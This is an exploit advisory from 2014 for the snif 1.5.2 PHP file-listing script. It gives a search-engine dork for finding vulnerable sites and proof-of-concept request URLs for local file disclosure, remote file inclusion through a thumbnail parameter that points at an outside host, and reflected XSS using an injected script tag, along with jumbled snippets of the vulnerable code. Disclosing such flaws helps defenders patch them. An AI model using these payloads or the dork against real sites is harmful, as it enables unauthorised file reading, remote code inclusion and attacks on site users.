facebook facebook twitter rss

snif 1.5.2 © 2003-04 Kai Blankenhorn Multiple Vulnerabilities

Author: jsass , Published: 26-01-2014
################################################################################
[+] Exploit Title: LFD&RFI&XSS snif 1.5.2 © 2003-04 Kai Blankenhorn Vulnerability #
[+] Author: jsass #
[+] Contact: Twitter:@Kwsecurity #
[+] Vendor Homepage: http://www.bitfolge.de/download/snif_152.zip
[+] Dork: (1) "snif 1.5.2 © 2003-04 Kai Blankenhorn" & (2) "valid XHTML 1.1 valid CSS 2" #
################################################################################


(1): Local File Disclosure
http://localhost/d/index.php?path=subdir/&download=s.jpg

code :

readfile($filename);
$filename = safedirectory($path . rawurldecode($download));
$path = safedirectory($path);
$path = $_GET['path'];
$download = stripslashes($_GET['download']);

(2): Remote File Include

http://localhost/d/index.php?thumbnail=http://site/aa.jpg

code :

if ($_GET["thumbnail"]!="") {
GLOBAL $thumbnailHeight, $cacheThumbnails;


(3): xss

http://localhost/d/index.php?sort=name&order=desc"/><script>alert(2)</script>

########################################################################################


Great's: Mr.Exit , rNDix , Q8 spy , sec4ever.com , is-sec.com & z3r0dY.Com All my frinds !

Like us on Facebook :